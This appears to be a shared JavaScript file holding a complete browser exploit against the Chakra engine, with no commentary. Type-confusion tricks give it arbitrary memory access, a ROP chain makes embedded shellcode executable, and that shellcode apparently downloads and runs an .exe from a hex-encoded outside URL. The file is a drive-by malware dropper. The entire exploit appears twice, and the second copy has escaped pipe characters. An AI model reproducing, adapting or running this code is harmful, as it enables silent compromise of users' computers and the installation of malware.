koike/XsSgBz.js Secret

## XsSgBz.js
function EscapeHexString(str) {
    var finstr = "";
    for(var x = 0; x < str.length; x += 2) {
        finstr = finstr + "%u" + "00" + str.substr(x, 2);
    }
    return finstr;
}

function PutDataAndGetAddr(t) {
    var d = new Array(1, 2, 3);
    class dummy {
        constructor() {
            return d;
        }
    }
    class MyArray extends Array {
        static get [Symbol.species]() {
            return
            dummy;
        }
    }
    var a = new Array({}, t, "theori", 7, 7, 7, 7, 7);

    function test(i) {
        return true;
    }
    a.__proto__ = MyArray.prototype;
    var o = a.filter(test);
    var h = [];
    for (item in o) {
        var n = new Number(o[item]);
        if (n < 0) {
            n = n + 0x100000000;
        }
        h.push(n);
    }
    return [h[3], h[2]];
}

var nburl = "687474703A2F2F706C61796E636F2E636C75622F31312E372F31312E372E6578650000";
var she = "9090909090909090909090909090909090909090909090909090909090909090909090EB7133C9648B71308B760C8B761C8B5E088B7E208B3666394F1875F2C3608B6C24248B453C8B54287803D58B4A188B5A2003DDE334498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242875E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C58944241C61C3E892FFFFFF5DEB05E8F3FFFFFF8BFD81EF0CFFFFFF8BF581EE7AFFFFFF81ED74FFFFFF6833CA8A5B53E884FFFFFF556A64FFD0578BF803FDA4807FFF0075F95F688E4E0EEC53E867FFFFFF33C966B96F6E516875726C6D54FFD068361A2F7050E84DFFFFFF33C951518D3781C698FFFFFF565751FFD06898FE8A0E53E831FFFFFF415156FFD0687ED8E27353E821FFFFFFFFD07A2E746D7000212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121FF70C7FDDEC0AFDA";
var sc = unescape(EscapeHexString(she+nburl));
var [shi, slo] = PutDataAndGetAddr(sc);

var Long = dcodeIO.Long;
var dv;
var fdv = new DataView(new ArrayBuffer(8));
var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice();
var [hi, lo] = PutDataAndGetAddr(x);
[hi, lo] = [hi | 0, (lo + 0x58) | 0];
TriggerFillFromPrototypesBug(lo, hi);
var vtable = Read64(new Long(lo - 0x58, hi, true));
var chakraBase = Read64(vtable).sub(0x274C40);
var threadCtxPtr = Read64(chakraBase.add(0x735EA8));
var stackLimit = Read64(threadCtxPtr.add(0x388));
var stack = stackLimit.sub(0xC000).add(10 * 1024 * 1024);
var retPtr = chakraBase.add(0x162A1D);
var retPtrAddr;
for (var i = 8; i < 32 * 1024; i += 8) {
    var val = Read64(stack.sub(i));
    if (val.equals(retPtr)) {
        retPtrAddr = stack.sub(i);
        break;
    }
}
var shcodeAddr = Read64((new Long(slo | 0, shi | 0, true).add(0x20)));
var filler = new Long(0, 0, true);
var rop = [
    chakraBase.add(0x1DA2F5),
    shcodeAddr.and(new Long(0xFFFFF000, 0xFFFFFFFF, true)),
    new Long(0x1000, 0, true),
    new Long(0x40, 0, true),
    chakraBase.add(0x1DA2CB),
    filler, filler, filler, filler, filler, filler,
    new Long(0, 0, true),
    filler, filler, filler, filler, filler, filler,
    filler, filler, filler, filler, filler, filler,
    shcodeAddr
];
for (var i = 0; i < rop.length; ++i) {
    Write64(retPtrAddr.add(i * 8), rop[i]);
}
document.write();

function TriggerFillFromPrototypesBug(lo, hi) {
    x[2] = lo;
    x[3] = hi;
    x[10] = (lo - 0x38) | 0;
    x[11] = hi;
    x[8] = 0x200;
    x[14] = (lo - 0x58) | 0;
    x[15] = hi;
    var a = new Array(0x11111111, 0, 0x22222222, 0, 0x33333333, 0, lo, hi, 0x55555555, 0);
    var handler = {
        getPrototypeOf: function (target, name) {
            return a;
        }
    };
    var p = new Proxy([], handler);
    var b = [{},
    [], "abc"
    ];
    b.__proto__ = p;
    b.length = 4;
    a.shift.call(b);
    dv = b[2];
}

function SetAddress(addr) {
    x[14] = addr.low | 0;
    x[15] = addr.high | 0;
}

function Read32(addr) {
    SetAddress(addr);
    return new Long(fdv.getUint32.call(dv, 0, true), 0, true);
}

function Read64(addr) {
    SetAddress(addr);
    return new Long(fdv.getUint32.call(dv, 0, true), fdv.getUint32.call(dv, 4, true), true);
}

function Write32(addr, val) {
    SetAddress(addr);
    fdv.setUint32.call(dv, 0, val.low | 0, true);
}

function Write64(addr, val) {
    SetAddress(addr);
    fdv.setUint32.call(dv, 0, val.low | 0, true);
    fdv.setUint32.call(dv, 4, val.high | 0, true);
}
	function EscapeHexString(str) {
	var finstr = "";
	for(var x = 0; x < str.length; x += 2) {
	finstr = finstr + "%u" + "00" + str.substr(x, 2);
	}
	return finstr;
	}

	function PutDataAndGetAddr(t) {
	var d = new Array(1, 2, 3);
	class dummy {
	constructor() {
	return d;
	}
	}
	class MyArray extends Array {
	static get [Symbol.species]() {
	return
	dummy;
	}
	}
	var a = new Array({}, t, "theori", 7, 7, 7, 7, 7);

	function test(i) {
	return true;
	}
	a.__proto__ = MyArray.prototype;
	var o = a.filter(test);
	var h = [];
	for (item in o) {
	var n = new Number(o[item]);
	if (n < 0) {
	n = n + 0x100000000;
	}
	h.push(n);
	}
	return [h[3], h[2]];
	}

	var nburl = "687474703A2F2F706C61796E636F2E636C75622F31312E372F31312E372E6578650000";
	var she = "9090909090909090909090909090909090909090909090909090909090909090909090EB7133C9648B71308B760C8B761C8B5E088B7E208B3666394F1875F2C3608B6C24248B453C8B54287803D58B4A188B5A2003DDE334498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242875E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C58944241C61C3E892FFFFFF5DEB05E8F3FFFFFF8BFD81EF0CFFFFFF8BF581EE7AFFFFFF81ED74FFFFFF6833CA8A5B53E884FFFFFF556A64FFD0578BF803FDA4807FFF0075F95F688E4E0EEC53E867FFFFFF33C966B96F6E516875726C6D54FFD068361A2F7050E84DFFFFFF33C951518D3781C698FFFFFF565751FFD06898FE8A0E53E831FFFFFF415156FFD0687ED8E27353E821FFFFFFFFD07A2E746D7000212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121FF70C7FDDEC0AFDA";
	var sc = unescape(EscapeHexString(she+nburl));
	var [shi, slo] = PutDataAndGetAddr(sc);

	var Long = dcodeIO.Long;
	var dv;
	var fdv = new DataView(new ArrayBuffer(8));
	var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice();
	var [hi, lo] = PutDataAndGetAddr(x);
	[hi, lo] = [hi \| 0, (lo + 0x58) \| 0];
	TriggerFillFromPrototypesBug(lo, hi);
	var vtable = Read64(new Long(lo - 0x58, hi, true));
	var chakraBase = Read64(vtable).sub(0x274C40);
	var threadCtxPtr = Read64(chakraBase.add(0x735EA8));
	var stackLimit = Read64(threadCtxPtr.add(0x388));
	var stack = stackLimit.sub(0xC000).add(10 * 1024 * 1024);
	var retPtr = chakraBase.add(0x162A1D);
	var retPtrAddr;
	for (var i = 8; i < 32 * 1024; i += 8) {
	var val = Read64(stack.sub(i));
	if (val.equals(retPtr)) {
	retPtrAddr = stack.sub(i);
	break;
	}
	}
	var shcodeAddr = Read64((new Long(slo \| 0, shi \| 0, true).add(0x20)));
	var filler = new Long(0, 0, true);
	var rop = [
	chakraBase.add(0x1DA2F5),
	shcodeAddr.and(new Long(0xFFFFF000, 0xFFFFFFFF, true)),
	new Long(0x1000, 0, true),
	new Long(0x40, 0, true),
	chakraBase.add(0x1DA2CB),
	filler, filler, filler, filler, filler, filler,
	new Long(0, 0, true),
	filler, filler, filler, filler, filler, filler,
	filler, filler, filler, filler, filler, filler,
	shcodeAddr
	];
	for (var i = 0; i < rop.length; ++i) {
	Write64(retPtrAddr.add(i * 8), rop[i]);
	}
	document.write();

	function TriggerFillFromPrototypesBug(lo, hi) {
	x[2] = lo;
	x[3] = hi;
	x[10] = (lo - 0x38) \| 0;
	x[11] = hi;
	x[8] = 0x200;
	x[14] = (lo - 0x58) \| 0;
	x[15] = hi;
	var a = new Array(0x11111111, 0, 0x22222222, 0, 0x33333333, 0, lo, hi, 0x55555555, 0);
	var handler = {
	getPrototypeOf: function (target, name) {
	return a;
	}
	};
	var p = new Proxy([], handler);
	var b = [{},
	[], "abc"
	];
	b.__proto__ = p;
	b.length = 4;
	a.shift.call(b);
	dv = b[2];
	}

	function SetAddress(addr) {
	x[14] = addr.low \| 0;
	x[15] = addr.high \| 0;
	}

	function Read32(addr) {
	SetAddress(addr);
	return new Long(fdv.getUint32.call(dv, 0, true), 0, true);
	}

	function Read64(addr) {
	SetAddress(addr);
	return new Long(fdv.getUint32.call(dv, 0, true), fdv.getUint32.call(dv, 4, true), true);
	}

	function Write32(addr, val) {
	SetAddress(addr);
	fdv.setUint32.call(dv, 0, val.low \| 0, true);
	}

	function Write64(addr, val) {
	SetAddress(addr);
	fdv.setUint32.call(dv, 0, val.low \| 0, true);
	fdv.setUint32.call(dv, 4, val.high \| 0, true);
	}